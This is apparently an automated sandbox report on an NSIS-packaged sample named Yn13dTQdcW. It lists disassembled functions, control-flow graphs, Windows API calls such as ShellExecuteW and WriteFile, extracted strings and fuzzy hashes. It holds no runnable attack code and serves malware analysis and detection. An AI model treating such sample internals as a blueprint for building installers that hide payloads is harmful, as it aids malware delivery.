                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                      • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$NormMimeThFreightNaturalInfrared
                                                                                                                                                                                      • API String ID: 4286501637-1175315670
                                                                                                                                                                                      • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                      • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                                      • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 587 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 590 403603-403608 587->590 591 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 587->591 592 4037e2-4037e6 590->592 599 403641 591->599 600 403728-403736 call 4032d2 591->600 602 403646-40365d 599->602 606 4037f1-4037f6 600->606 607 40373c-40373f 600->607 604 403661-403663 call 403336 602->604 605 40365f 602->605 611 403668-40366a 604->611 605->604 606->592 609 403741-403759 call 403368 call 403336 607->609 610 40376b-403795 GlobalAlloc call 403368 call 40337f 607->610 609->606 638 40375f-403765 609->638 610->606 636 403797-4037a8 610->636 614 403670-403677 611->614 615 4037e9-4037f0 call 4032d2 611->615 616 4036f3-4036f7 614->616 617 403679-40368d call 405e38 614->617 615->606 623 403701-403707 616->623 624 4036f9-403700 call 4032d2 616->624 617->623 634 40368f-403696 617->634 627 403716-403720 623->627 628 403709-403713 call 4072ad 623->628 624->623 627->602 635 403726 627->635 628->627 634->623 640 403698-40369f 634->640 635->600 641 4037b0-4037b3 636->641 642 4037aa 636->642 638->606 638->610 640->623 643 4036a1-4036a8 640->643 644 4037b6-4037be 641->644 642->641 643->623 645 4036aa-4036b1 643->645 644->644 646 4037c0-4037db SetFilePointer call 405e38 644->646 645->623 647 4036b3-4036d3 645->647 650 4037e0 646->650 647->606 649 4036d9-4036dd 647->649 651 4036e5-4036ed 649->651 652 4036df-4036e3 649->652 650->592 651->623 653 4036ef-4036f1 651->653 652->635 652->651 653->623
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                                        • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                        • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • Inst, xrefs: 00403698
                                                                                                                                                                                      • Null, xrefs: 004036AA
                                                                                                                                                                                      • soft, xrefs: 004036A1
                                                                                                                                                                                      • Error launching installer, xrefs: 00403603
                                                                                                                                                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                      • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                      • API String ID: 4283519449-527102705
                                                                                                                                                                                      • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                      • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 654 40337f-403398 655 4033a1-4033a9 654->655 656 40339a 654->656 657 4033b2-4033b7 655->657 658 4033ab 655->658 656->655 659 4033c7-4033d4 call 403336 657->659 660 4033b9-4033c2 call 403368 657->660 658->657 664 4033d6 659->664 665 4033de-4033e5 659->665 660->659 666 4033d8-4033d9 664->666 667 403546-403548 665->667 668 4033eb-403432 GetTickCount 665->668 671 403567-40356b 666->671 669 40354a-40354d 667->669 670 4035ac-4035af 667->670 672 403564 668->672 673 403438-403440 668->673 674 403552-40355b call 403336 669->674 675 40354f 669->675 676 4035b1 670->676 677 40356e-403574 670->677 672->671 678 403442 673->678 679 403445-403453 call 403336 673->679 674->664 687 403561 674->687 675->674 676->672 682 403576 677->682 683 403579-403587 call 403336 677->683 678->679 679->664 688 403455-40345e 679->688 682->683 683->664 691 40358d-40359f WriteFile 683->691 687->672 690 403464-403484 call 4076a0 688->690 697 403538-40353a 690->697 698 40348a-40349d GetTickCount 690->698 693 4035a1-4035a4 691->693 694 40353f-403541 691->694 693->694 696 4035a6-4035a9 693->696 694->666 696->670 697->666 699 4034e8-4034ec 698->699 700 40349f-4034a7 698->700 701 40352d-403530 699->701 702 4034ee-4034f1 699->702 703 4034a9-4034ad 700->703 704 4034af-4034e0 MulDiv wsprintfW call 404f9e 700->704 701->673 708 403536 701->708 706 403513-40351e 702->706 707 4034f3-403507 WriteFile 702->707 703->699 703->704 709 4034e5 704->709 711 403521-403525 706->711 707->694 710 403509-40350c 707->710 708->672 709->699 710->694 712 40350e-403511 710->712 711->690 713 40352b 711->713 712->711 713->672
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                      • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                                      • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00429574,00403792,00000000), ref: 004034FF
                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                      • String ID: (]C$... %d%%$pAB
                                                                                                                                                                                      • API String ID: 651206458-3635341587
                                                                                                                                                                                      • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                      • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                                                      • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                      • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrlenW.KERNEL32(00445D80,00429574,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                      • lstrlenW.KERNEL32(004034E5,00445D80,00429574,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                      • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00429574,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                      • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00429574,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2740478559-0
                                                                                                                                                                                      • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                      • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                      • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 729 402713-40273b call 406035 * 2 734 402746-402749 729->734 735 40273d-402743 call 40145c 729->735 737 402755-402758 734->737 738 40274b-402752 call 40145c 734->738 735->734 741 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 737->741 742 40275a-402761 call 40145c 737->742 738->737 742->741
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • <RM>, xrefs: 00402713
                                                                                                                                                                                      • NormMimeThFreightNaturalInfrared, xrefs: 00402770
                                                                                                                                                                                      • WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                      • String ID: <RM>$NormMimeThFreightNaturalInfrared$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                                      • API String ID: 247603264-1999113990
                                                                                                                                                                                      • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                      • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                                                      • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                      • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 750 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 761 402223-4030f2 call 4062cf 750->761 762 40220d-40221b call 4062cf 750->762 762->761
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00429574,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00429574,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00429574,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                      • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                      • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                      • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                      • API String ID: 3156913733-2180253247
                                                                                                                                                                                      • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                      • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                                                                      • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                      • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 770 405eab-405eb7 771 405eb8-405eec GetTickCount GetTempFileNameW 770->771 772 405efb-405efd 771->772 773 405eee-405ef0 771->773 775 405ef5-405ef8 772->775 773->771 774 405ef2 773->774 774->775
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CountFileNameTempTick
                                                                                                                                                                                      • String ID: nsa
                                                                                                                                                                                      • API String ID: 1716503409-2209301699
                                                                                                                                                                                      • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                      • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                      • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 776 402175-40218b call 401446 * 2 781 402198-40219d 776->781 782 40218d-402197 call 4062cf 776->782 783 4021aa-4021b0 EnableWindow 781->783 784 40219f-4021a5 ShowWindow 781->784 782->781 786 4030e3-4030f2 783->786 784->786
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                      • String ID: HideWindow
                                                                                                                                                                                      • API String ID: 1249568736-780306582
                                                                                                                                                                                      • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                      • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
